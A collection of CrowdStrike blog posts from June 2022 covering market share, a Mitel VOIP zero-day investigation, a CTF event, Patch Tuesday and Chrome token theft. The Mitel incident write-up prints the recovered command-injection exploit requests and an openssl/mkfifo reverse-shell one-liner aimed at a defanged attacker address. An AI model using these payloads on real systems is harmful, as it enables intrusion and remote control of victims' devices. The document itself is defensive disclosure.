🔒
There are new articles available, click to refresh the page.
Before yesterdayCrowdStrike

CrowdStrike Tops IDC Worldwide Corporate Endpoint Security Market Shares, 2021

23 June 2022 at 14:44

CrowdStrike is proud to be ranked No. 1 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report (doc #US48580022, May 2022). We are grateful to our customers and partners for helping us achieve this significant milestone, yet its real value goes far beyond the bottom line. Our conviction is that the only way to stop modern adversaries is by using a best-in-class platform that leverages native artificial intelligence (AI), machine learning (ML) and automation to harness the power of high-fidelity data and front-line human expertise. 

Rich telemetry and threat intelligence form the foundation of nearly everything CrowdStrike does. It trains our AI and ML algorithms to make hyper-accurate decisions, gives our threat hunters and incident responders the context they need to root out and contain active attacks, informs intelligent automation across our platform, and empowers SecOps professionals with the visibility to simplify and accelerate detection, investigation and response workflows across their environment.

Unifying AI and Human Expertise to Stop Adversaries

Some AI experts argue that general purpose methods such as search and learning that leverage ever-increasing training sets and computing power are what primarily drive how machines can solve the most complex problems (e.g., beating an expert in the game of Go). You can think of this approach as teaching the algorithm how to think and learn (like a toddler learning how to play the game by watching their friends and then trying over and over until they get it right) rather than putting specific knowledge into it (like the same toddler being told over 200 possible moves and common strategies for gameplay and then left on their own to figure things out). 

Others would argue that simply adding more raw data and computing power isn’t enough, as human knowledge is critical to achieving a specific outcome (and to reducing the carbon footprint from unlimited computing). 

While this debate is sure to continue, let’s examine how CrowdStrike holistically blends both approaches — supervised and unsupervised — to achieve cloud-scale AI that is enriched with human-led expertise to solve one of the hardest challenges in IT: counteracting a malicious human on the other side of the keyboard.

High-Fidelity Data Is the Bedrock of Analytics

Every good decision in cybersecurity starts with good data, which must come from sensors deployed holistically across the enterprise. The more weak signals you can integrate into a strong signal, the better your chances are of finding the attack that matters most, which is one of the core philosophies behind CrowdStrike Falcon XDR. According to the IDC report, we owned “12.6% corporate endpoint security market in 2021,” leapfrogging all other providers and delivering significant year-over-year growth. Our growth means we have evermore sensors in the most critical, highly targeted organizations, resulting in more high-fidelity data for analytics.

By the numbers, CrowdStrike Threat Graph® processes trillions of security events per day from nearly 18,000 customers around the world. One of the secrets of AI, and the Threat Graph itself, is how the value of data compounds over time. The more high quality data you have over an extended time horizon, the faster and more accurate decisions you can make. As we’ve been categorizing indicators of attack (IOAs) and tactics, techniques and procedures (TTPs) for over a decade, chances are we’ve already seen a particular malicious behavior or something like it. This allows us to predict the right response in near real time. Whether the response is a prevention event or investigating, hunting or running forensics across our vast data repository, it results in better prevention rates and faster time to containment for our customers.

AI-powered Analytics Is Key to Stay Ahead of Evolving Adversaries

Of course, raw data isn’t valuable without analytics. As we’ve seen throughout the long history of security information and event management (SIEM) systems, more data can often be overwhelming, requiring vast resources to ingest, store, manage and transform raw telemetry into actionable insights. SIEMs are often referred to as “garbage collectors” for data — garbage data in equals garbage data out.The last thing we need in cybersecurity is more noise. The key is gathering and integrating the right data to fuel analytics, which never means all data.

Across the CrowdStrike Falcon® platform, we employ multiple complementary layers of AI/ML to our rich dataset to deliver accurate results, including our continuously learning malware prevention capabilities on the endpoint that can stop never-before-seen threats before they result in a breach. Additionally, with Falcon XDR, we apply analytics across disparate sources of security telemetry to surface hidden threats that could bypass traditional single-point detection tools. 

Another critical area of focus for analytics is the quality of the security analyst experience. CrowdStrike constantly finds ways to inject analytics into our platform to make the job of detecting, investigating and responding to events simpler and more effective. For instance, no analyst intervention is needed to build the complete visualization of an adversary’s complex attack path, saving hours and greatly reducing mean time to detect/mean time to respond (MTTD/MTTR); think of this like “autocomplete” in your email. 

CrowdStrike will continue to drive new innovations in the Falcon platform to take the hands-on grunt work out of security operations. One such example is the native integration of the CrowdStrike Falcon Fusion security orchestration and automation response (SOAR) solution into Falcon XDR, which allows analysts to focus on responding in a timely manner to the relatively few events that truly matter, the situations where responses can’t be fully automated.

Human-led Expertise Informs AI in a Virtuous Cycle

CrowdStrike is privileged to help our customers prepare, hunt, react to and recover from potential cyberattacks with the world’s best threat hunting and incident response (IR) team. From our fully managed Falcon Complete™ solution to threat hunting and IR, the experts behind these services constantly feed the results of their activities — be it a newly discovered malware family, IOAs or other adversary tactics — into the Threat Graph. CrowdStrike technology then automatically uses what our experts have learned to train our AI/ML models to detect and stop future attacks. The more hunting or frontline engagements we perform, the more tacit knowledge our platform retains. As our agents and services continue to be deployed across more enterprises and endpoints, we gain more visibility and discover and contain more threats, which turns into a flywheel that keeps CrowdStrike ahead of the most advanced adversaries.

Turning On the Flywheel to Stop Breaches

We believe that the trifecta for stopping breaches is to unify the world’s best platform, with the industry’s deepest data to power AI/ML and automation, all bolstered by elite human expertise. We’re proud to have been ranked No. 1 market share for 2021 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report, but we are even more excited about what this means for our customer as we continue to broaden our reach, creating a virtuous cycle that keeps adversaries on their heels.

Additional Resources

The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

23 June 2022 at 16:26
  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rm1 command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message. 

Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

The first outbound request returned valid json related to the application to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Additional Resources

Capture the Flag: CrowdStrike Intelligence Adversary Quest 2022

16 June 2022 at 19:04

The Adversary Quest is back! From July 11 through July 25, 2022, the CrowdStrike Intelligence Advanced Research Team invites you to go head-to-head with three unique adversaries during our second annual Adversary Quest. Last year hundreds of Adversary Quest participants battled for the coveted CrowdStrike swag that was awarded to the top 50 high scorers. Now it’s your chance to defeat the adversary and win!

Register now and you will be able to track CATAPULT SPIDER (a ransomware adversary with a weird passion for a specific altcoin), PROTECTIVE PENGUIN (sentient Antarctic wildlife with offensive cybersecurity capabilities) and TABLOID JACKAL (a previously unknown adversary in disagreement with SPACE JACKAL’s preferences for source code indentation).

How to Play

The Adversary Quest will feature one track for each adversary, and each track will consist of four challenges. The tracks may include topics such as binary exploitation, reverse engineering, cryptography and OSINT research. The game is open to individual players (no teams) and designed to be an enjoyable experience for security enthusiasts of all skill levels.

During the game, you will need to find and submit flags that conform to the following format: CS{this_is_an_example}. If your finding doesn’t follow this format, you will need to keep searching. For each finding, you will get points that sum up to a total score.

The game is meant to be enjoyable for everyone, so please don’t attack the game’s infrastructure (e.g., the scoreboard or any service that is not obviously part of a challenge) and don’t share write-ups or spoilers before the game ends. After the game, we would love to see your solutions and write-ups online.

The formal terms of the event are at https://adversary.quest/tos. Like last year, the best players will be awarded some cool swag!

Timeline

  • Register now at https://adversary.quest/register
  • The event begins on July 11, 2022 at 17:00 UTC / 12:00 p.m. EST / 09:00 a.m. PST
  • The event ends on July 25, 2022 at 17:00 UTC / 12:00 p.m. EST / 09:00 a.m. PST

Contact

Email any questions about the event to [email protected]. We look forward to your participation!

Additional Resources

June 2022 Patch Tuesday: Three Critical CVEs and a Fix for the Follina Vulnerability

16 June 2022 at 18:29

Microsoft has released 55 security patches for its June 2022 Patch Tuesday rollout. Three of the 55 CVEs addressed are rated Critical severity, with CVE-2022-30136 having the highest CVSS score of 9.8. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching. Additionally, we discuss a much-anticipated patch for the Follina vulnerability (CVE-2022-30190). 

Official Fix for Windows MSDT Follina Zero-Day Vulnerability

Microsoft’s June 2022 patch update includes a fix for the widely exploited Windows Microsoft Diagnostic Tool (MSDT) zero-day vulnerability known as Follina. Last month, this Windows zero-day vulnerability was discovered in attacks that executed malicious PowerShell commands via MSDT. When it was first detected, the vulnerability bypassed all security protections, including Microsoft Office’s Protected View, and executed the PowerShell scripts when a user simply opened a Word document. A brief timeline on this vulnerability:

  • On May 27, 2022, a remote code execution vulnerability was reported affecting MSDT
  • The vulnerability, which is classified as a zero-day, can be invoked via weaponized Microsoft Office documents, Rich Text Format (RTF) files, XML files and HTML files
  • The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs)
Rank CVSS Score CVE Description
Critical 7.8 CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. 

June 2022 Risk Analysis

The top three attack types — remote code execution (RCE), elevation of privilege and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of June 2022 Patch Tuesday attack types

The affected product families, however, differ greatly from last month. In May 2022, Developer Tools — including Visual Studio Code, Visual Studio 2019 and 2022, and Microsoft .NET Framework — saw a significant decrease in vulnerabilities patched. Microsoft Windows received the most patches this month, with Extended Security Updates (ESU) following close behind. A single Microsoft Exchange update was also included in this month’s patching list.

Figure 2. Breakdown of June 2022 Patch Tuesday affected product families

Critical Vulnerabilities Affecting LDAP, NFS and Hyper-V

Three vulnerabilities ranked as Critical received patches this month. Affected products are Windows Lightweight Directory Access Protocol (LDAP), Windows Network File System (NFS) and Windows Hyper-V. Let’s review each of these vulnerabilities and how they could affect an organization’s environment. 

CVE-2022-30136: This Windows Network File System remote code execution vulnerability with a CVSS of 9.8 is very similar to CVE-2022-26937, a Network File System (NFS) CVE patched last month. This vulnerability could allow a remote attacker to execute privileged code on affected systems running NFS. On the surface, the only difference between the patches is that this month’s update fixes a flaw in NFSV4.1, whereas the flaws found last month only affected versions NSFV2.0 and NSFV3.0. Enterprises running NFS should prioritize testing and deploying this fix.

CVE-2022-30163: This Windows Hyper-V remote code execution vulnerability with a CVSS of 8.5 could allow a user on a Hyper-V guest to run their code on the underlying Hyper-V host OS. The update doesn’t list the privileges the attacker’s code would run at, but any guest-to-host escape should be taken seriously. Microsoft notes that attack complexity is high since an attacker would need to win a race condition.

CVE-2022-30139: This Windows Lightweight Directory Access Protocol (LDAP) remote code execution vulnerability with a CVSS of 7.5 is one of the seven LDAP vulnerabilities fixed this month. The volume of CVEs in LDAP over the last couple of months could indicate a broad attack surface in the component.

Rank CVSS Score CVE Description
Critical 9.8 CVE-2022-30136 Windows Network File System Remote Code Execution Vulnerability
Critical 8.5 CVE-2022-30163 Windows Hyper-V Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-30139 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Additional Windows LDAP Remote Code Execution Bugs

There are seven RCE vulnerabilities affecting Windows LDAP patched this month, a decrease from the 10 LDAP patches last month. One is rated as Critical (covered in the previous section), and six are ranked as Important. The most severe of these received a CVSS score of 8.8 but would require the MaxReceiveBuffer LDAP policy to be set to a value higher than the default value.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30161 Windows LDAP Remote Code Execution Vulnerability
Important 8.8 CVE-2022-30153 Windows LDAP Remote Code Execution Vulnerability
Important 8.1 CVE-2022-30141 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30143 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30146 Windows LDAP Remote Code Execution Vulnerability
Important 7.5 CVE-2022-30149 Windows LDAP Remote Code Execution Vulnerability

Two Important Kerberos Vulnerabilities

Two vulnerabilities involving Windows Kerberos and Kerberos AppContainer received CVSS scores of 8.8 and 8.4, respectively, and a rank of Important. Nonetheless, these vulnerabilities are relevant to any organization using the affected products. 

CVE-2022-30164: Kerberos AppContainer security feature bypass vulnerability. If exploited, an attacker could bypass the Kerberos service ticketing feature that performs user access control checks. According to Microsoft, no user interaction is required, and attack complexity is rated Low. For more details, click here.

CVE-2022-30165: Windows Kerberos elevation of privilege vulnerability. Ranked as Important with a CVSS of 8.8, this bug in Kerberos affects servers with both Credential Security Service Provider (CredSSP) and Remote Credential Guard (RCG) installed. An attacker could elevate privileges then spoof the Kerberos logon process when an RCG connection is made via CredSSP. According to Microsoft, no user interaction is required and attack complexity is rated Low. For more details, click here.

Rank CVSS Score CVE Description
Important 8.8 CVE-2022-30165 Windows Kerberos Elevation of Privilege Vulnerability
Important 8.4 CVE-2022-30164 Kerberos AppContainer Security Feature Bypass Vulnerability

Falcon Spotlight provides the visibility SecOps teams need to quickly identify which vulnerabilities are prevalent in your organization’s environment. When it comes to additional detection capabilities, Falcon Spotlight is completely integrated within the CrowdStrike Falcon® platform that offers a host of other capabilities, including the ability to take swift and instantaneous action by isolating potentially compromised hosts from exploited vulnerabilities. Additionally, the Falcon platform mitigates the risk from vulnerabilities that can not be patched rapidly by detecting and automatically preventing exploitation attempts and post-exploitation activity.

H1 2022 Vulnerability Recap

There have been 461 CVEs affecting Microsoft products as of June 14, 2022. While this is markedly lower than the 612 vulnerabilities reported in H1 2021, what has remained consistent is the persistence of adversaries working to take advantage of vulnerabilities across myriad products. Out-of-band (OOB) patching and active exploitation continues to occur (such as Follina and Log4j), meaning a review of Patch Tuesday vulnerabilities should be a key component in your vulnerability management program.

Figure 3. Number of CVEs that Microsoft released each month, January-June 2022

While April saw the greatest number of vulnerabilities patched — it was the only month to exceed 100 in H1 2022 — the quantity of patches in a given month does not correlate with higher risk or indicate a higher rate of exploitation. It also does not signify an increase in eCriminal behavior for a particular product or service. In the latest Verizon Data Breach Investigations (DBIR) Report, vulnerability exploit analysis showed that organizations running a robust vulnerability management program were able to patch or remediate vulnerabilities and had no discernable security issues relating to vulnerabilities. However, organizations that did not regularly review vulnerability within their lifecycle ended up with more incidents, especially around internet-facing hosts. 

What does all this mean for you in 2022? We have a few insights when it comes to maintaining your vulnerability management program:

  • Adversaries are persistent and consistent; they have all the time in the world and will continue to look for access in whatever way possible. Remember, a small amount of access is still access. 
  • Vulnerabilities do not exist in a vacuum; assets, hosts and entities are all connected to each other in an environment, and many of them to the internet as well. It’s increasingly apparent that holistic visibility of all assets and how they relate to each other should be monitored in conjunction with your vulnerability management program. Security hygiene and attack surface visibility can offer valuable insights into how you prioritize and patch vulnerabilities within your environment.
  • Patch Tuesday matters! If any part of your environment uses Microsoft products, or if other vendors conduct patching cycles, it’s important to review the patches released every month and take time to apply fixes or updates to products wherever applicable. 

When It Comes to Vulnerabilities, It’s Not Just About Quantity

Adversaries will never go away. They will use any and every opportunity to take advantage of a flaw, weakness or vulnerability. If you have the big “holes” fixed in your organization’s environment, that’s a great start, but to stay on top of your vulnerability lifecycle program, SecOps staff must regularly maintain the program you’ve defined to determine which vulnerabilities are critical to your environment. Even if a vulnerability has a high CVSS score, that doesn’t necessarily mean it’s critical to your team. Context and prioritization matter, especially given that many SecOps teams have limited time to apply updates and patches.

CrowdStrike recommends relying on solutions that aid in speedy mitigation and remediation when it comes to all vulnerabilities, both in and out of Patch Tuesday cycles. CrowdStrike’s suite of SecOps solutions help provide deep-level context, including insights surrounding more advanced threats. 

For vulnerability management specifically, Falcon Spotlight can help you dynamically rate and prioritize vulnerabilities that matter to your organization, and help you establish workflows to automate those CVEs that need to be scheduled for more regular maintenance. See how Falcon Spotlight operates via its game-changing AI with ExPRT.AI and workflows.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources

Seven Key Ingredients of Incident Response to Reduce the Time and Cost of Recovery

8 June 2022 at 18:54

When a breach occurs, time is of the essence. The decisions you make about whom to collaborate with and how to respond will determine how much impact the incident is going to have on your business operations.

This blog outlines the seven key ingredients needed for successful incident response, given the spate of widespread ransomware attacks we are witnessing today. This unique approach to incident response is captured in an insightful CrowdStrike Services Incident Response eBook that describes in more detail the value of each ingredient and how it contributes to a substantial reduction in the time it takes to recover from a cyber incident (reducing weeks/months to hours/days) and the cost of recovery, and most importantly the avoidance of business downtime that could have a material impact on an organization’s financials.

These key ingredients are based on many years and thousands of IR engagements defending organizations across the globe against nation-state and eCrime threat actors. We have evolved and honed our incident response technologies, processes and methods to keep pace with these adversaries so we can help you respond to today’s sophisticated, widespread attacks.

With these key ingredients and the value they deliver, we can recover from a widespread attack with speed and precision, with minimal user impact and system downtime, and avoid any potential business outage or interruption for our clients. The key ingredients are:

  1. Immediate Threat Visibility
  2. Active Threat Containment
  3. Accelerated Forensic Analysis
  4. Real Time Response and Recovery
  5. Enterprise Remediation
  6. Threat Hunting and Monitoring
  7. Managed Detection and Response

If you suspect you are the victim of a breach, your traditional security technology and processes may have failed you. The faster you can deploy next-generation security technology, the faster you can stop the breach.

The last thing you want in this situation is to use a traditional recovery approach that suggests the only way to recover from a breach is the full blunt force of wiping systems and applying full system remediation (reimage, rebuild or replace). This approach may have worked for attacks that occur on a handful of systems, but against today’s widespread ransomware attacks that impact hundreds or thousands of endpoints, we need a more intelligence-driven and effective solution — one that provides immediate visibility to the full threat context and enables the real-time surgical removal of attack artifacts with speed and precision.

In effect, the first four ingredients are the key: gain immediate threat visibility, contain the active threat, accelerate the forensic analysis, and recover the endpoints using real-time response. We do this to minimize the percentage of endpoints that require full system remediation. We want to recover the majority of endpoints using real-time response, so we only have to focus on reimaging or rebuilding a much smaller number of systems. For some clients, we are able to recover all of their systems using CrowdStrike Falcon® Real Time Response, enabling them to get back to business faster. 

While we are typically able to recover environments rapidly, we continue to support our clients with threat hunting and monitoring from the Falcon OverWatch™ threat hunting team for the duration of the engagement. Adversaries that gain access to a network look to establish persistence within your environment and are not going to go away easily. The OverWatch team monitors for any recurrences of the initial threat and any hands-on-keyboard activity that the adversary might attempt. At the end of the CrowdStrike Services Incident Response engagement, we want our clients to feel confident they have recovered from the breach and ejected the adversary completely from the network. For those clients that never wish to go through this again, we offer a fully managed detection and response (MDR) solution, Falcon Complete™, which allows customers to continue running the Falcon platform while relying on the expertise of our team to detect threats in 1 minute, investigate in 10 mins and respond inside of 1 hour to prevent breaches from impacting their business.

For more details on our modern intelligence-led approach to rapid response and recovery from today’s widespread security incidents, download our eBook on CrowdStrike Incident Response.

Additional Resources

  • Learn more about how CrowdStrike Breach Services can help you respond to an attack with speed and recover from an incident with surgical precision.
  • Download the complete CrowdStrike Incident Response eBook to learn more about CrowdStrike’s modern approach to rapid response and recovery from today’s widespread security incidents.
  • Get on-demand access to CrowdStrike incident responders, forensic investigators, threat hunters and endpoint recovery specialists with a CrowdStrike Services Retainer.

CrowdStrike Falcon Stops Modern Identity-Based Attacks in Chrome

  • A novel technique that reduces the overhead in extracting sensitive data from Chromium browser’s memory was recently found by researchers from CyberArk Labs 
  • Existing access to the targeted system is required before leveraging the technique
  • Successful use of the technique can lead to multifactor authentication (MFA) bypass by extracting valid authentication tokens from the web browser’s memory 
  • CrowdStrike has built defensive capability in the CrowdStrike Falcon® sensor against this technique
  • The Falcon platform helps identify, prevent and detect memory-based vulnerabilities and protect customers from modern identity-based attacks

Recent research from CyberArk Labs presents a new technique for extracting sensitive data from the Chromium browser’s memory. However, existing access to the targeted system is required before leveraging the technique to extract the sensitive data. The technique could enable identity-based attacks involving authentication bypass using Oauth cookies that have already passed an MFA challenge.

CrowdStrike built defensive capabilities to protect CrowdStrike customers from similar post-compromise attacks leveraging this novel technique for extracting valid authentication tokens from the Chromium browser’s memory. 

The Falcon sensor helps identify, prevent and detect memory-based vulnerabilities, while the Falcon platform enables customers to stay safe from identity-based attacks, enforcing Zero Trust on the endpoint, the identity and the data. 

According to the CrowdStrike Falcon OverWatch™ threat hunting team, 80% of breaches are now identity-driven. Stopping the adversary in real time and preventing attacks from progressing requires a unified approach to security that delivers native identity protection capabilities, halts adversaries and stops breaches.

About the Research and the Technique

The research and proof of concept (POC) demonstrate how sensitive information is extracted by a non-elevated process running on the local machine and performs direct access to Chrome’s memory using OpenProcess + ReadProcessMemory APIs.

While existing access to the targeted system is required before leveraging the technique, the extracted sensitive data could be used in subsequent identity-based attacks that can bypass MFA using Oauth cookies or enable lateral movement using extracted credentials. 

The presented technique takes a novel approach in reducing the overhead involved in extracting valid Oauth tokens from web browser memory by reading the Chromium browser’s memory and monitoring for specific login URLs. A snapshot is taken of specific memory buffer regions, both before and after login and authentication. This significantly reduces the amount of memory that needs to be dumped and scanned. Additionally, the technique reduces the amount of time necessary to extract the token and increases the window of opportunity for an attacker before the token expires.

In essence, an attacker could hijack an authenticated user’s browser session, get access to restricted information, and most significantly, bypass MFA without knowing any of the victim’s credentials.

For more detailed technical information on the research and POC, check out the research here.

CrowdStrike Falcon vs. the Memory-Based Data Extraction Technique

Recent research presented by CyberArk Labs to CrowdStrike shows the benefits of cooperation and collaboration in advancing the state of cybersecurity, ultimately helping to build better defense-in-depth capabilities to protect organizations from novel threats, tactics and techniques. Based on the details provided by the research and POC, we were able to build comprehensive Falcon capabilities to protect customers from the newly found technique and other similar ones.

After carefully analyzing the technique presented in the POC, we found there is a vast array of legitimate processes opening a handle to a browser process and using the same open handle access rights to read its memory. See Figure 1 for a snapshot.

Figure 1. Top 10 legitimate processes that use the same method for opening a process and accessing memory data, according to CrowdStrike telemetry (Click to enlarge)

This can present a big challenge to threat hunters as it can be like searching for the proverbial needle in a haystack when looking for malicious processes exhibiting the same behavior. However, there are some subtle differences in how the POC operates that can help us discern between benign and malicious processes. 

From a defense perspective, it’s important to look at the Chrome browser as a credential store, just like Local Security Authority Subsystem Service (LSASS) that’s responsible for enforcing security policy on the machine in terms of handling user authentication, password changes and authentication tokens. Identifying processes that attempt to inject or tamper with LSASS to either create a minidump or attach a debugger can potentially reveal malicious behavior.

The defense of browser credential theft requires similar thinking, both in terms of detection and prevention strategy, as well as a robust identity-based defense. 

When CrowdStrike’s machine learning and behavior-based indicators of attack (IOAs) determine a process is malicious, Falcon will automatically prevent this process from accessing the browser’s memory using this technique. 

